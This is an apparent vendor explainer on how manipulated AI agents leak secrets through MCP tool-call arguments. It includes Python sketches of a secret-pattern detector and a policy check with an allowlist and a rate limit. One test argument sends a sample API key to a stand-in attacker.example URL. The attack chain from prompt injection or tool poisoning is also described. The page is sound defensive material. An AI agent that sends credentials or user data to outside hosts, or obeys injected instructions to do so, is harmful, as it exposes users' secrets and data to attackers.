What is Data Exfiltration (Agent)?
Agent data exfiltration occurs when an AI agent is manipulated into sending sensitive data — API keys, user data, internal documents — to an unauthorised destination via MCP tool calls.
WHY IT MATTERS
AI agents have broad access to sensitive data: they read files, query databases, process emails, and interact with internal APIs. Data exfiltration attacks manipulate the agent into sending this data somewhere it shouldn't go — an attacker-controlled server, a public paste site, or a seemingly innocent API parameter.
The exfiltration channel is typically an MCP tool call. The agent might be tricked into including sensitive data as a search query (leaking to a search API), embedding it in a URL parameter (leaking to a web request tool), appending it to a message body (leaking to a communication tool), or encoding it in a file name (leaking to a file system tool).
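These channels share one trait: the secret travels inside an otherwise legitimate tool-call argument. A minimal detector can be sketched by scanning every string argument for credential-like patterns. The tool-call shape and the key formats below are illustrative assumptions, not PolicyLayer specifics.

```python
import re

# Patterns resembling common credential formats (illustrative, not exhaustive)
SECRET_PATTERNS = [
    re.compile(r"sk_live_[A-Za-z0-9]{16,}"),  # payment-style API key
    re.compile(r"AKIA[0-9A-Z]{16}"),          # AWS-style access key ID
]

def find_secrets(tool_call_args: dict) -> list[str]:
    """Return the names of string arguments that contain a credential-like value."""
    hits = []
    for name, value in tool_call_args.items():
        if not isinstance(value, str):
            continue
        if any(pat.search(value) for pat in SECRET_PATTERNS):
            hits.append(name)
    return hits

# A key smuggled into the URL parameter of a web-request tool:
call = {"url": "https://attacker.example/collect?d=sk_live_abcdef1234567890XYZ"}
print(find_secrets(call))  # ['url']
```

Pattern matching alone is a weak defence — attackers can encode or split secrets across calls — but it illustrates where the inspection point sits: on the arguments of the outbound tool call, not on the agent's reasoning.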
What makes agent-based exfiltration uniquely dangerous is volume and speed. A human insider threat is limited by manual effort. A manipulated agent can systematically read and exfiltrate entire databases, credential stores, or document repositories in minutes — all through legitimate-looking tool calls.
The attack often starts with a different vector — tool poisoning, indirect injection, or context poisoning — and culminates in exfiltration. The initial compromise gets the agent to follow malicious instructions; the exfiltration is the payload delivery.
HOW POLICYLAYER USES THIS
Intercept prevents data exfiltration through multiple policy controls. Argument validation rules can block parameters containing patterns that match API keys, tokens, or sensitive data formats. Destination allowlists restrict which URLs, email addresses, or endpoints tools can target. Rate limiting prevents bulk extraction even if individual calls pass validation. The audit trail provides full visibility into every parameter of every tool call, enabling rapid detection of exfiltration attempts.
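The controls above compose into a single decision per tool call. The sketch below shows one way such a policy check could be layered; the configuration shape, names, and thresholds are hypothetical, not Intercept's actual API.

```python
import re
import time
from urllib.parse import urlparse

# Hypothetical policy configuration -- illustrative, not Intercept's format
ALLOWED_HOSTS = {"api.internal.example", "docs.internal.example"}
SECRET_PATTERN = re.compile(r"(sk_live_|AKIA)[A-Za-z0-9]{12,}")
MAX_CALLS_PER_MINUTE = 30

_call_times: list[float] = []

def evaluate(tool: str, args: dict) -> tuple[bool, str]:
    """Return (allowed, reason) for a single tool call."""
    # 1. Argument validation: block credential-like strings in any parameter
    for name, value in args.items():
        if isinstance(value, str) and SECRET_PATTERN.search(value):
            return False, f"argument '{name}' matches a secret pattern"
    # 2. Destination allowlist: restrict which hosts a web tool may reach
    if "url" in args:
        host = urlparse(args["url"]).hostname or ""
        if host not in ALLOWED_HOSTS:
            return False, f"destination '{host}' not in allowlist"
    # 3. Rate limit: cap call volume to blunt bulk extraction
    now = time.monotonic()
    _call_times.append(now)
    if len([t for t in _call_times if now - t < 60]) > MAX_CALLS_PER_MINUTE:
        return False, "rate limit exceeded"
    return True, "ok"

print(evaluate("http_get", {"url": "https://evil.example/x"}))
# (False, "destination 'evil.example' not in allowlist")
```

Ordering matters: validation and allowlisting reject individual calls outright, while the rate limit catches slow, low-and-legitimate-looking extraction that passes both. Every decision, allowed or blocked, would also land in the audit trail for later review.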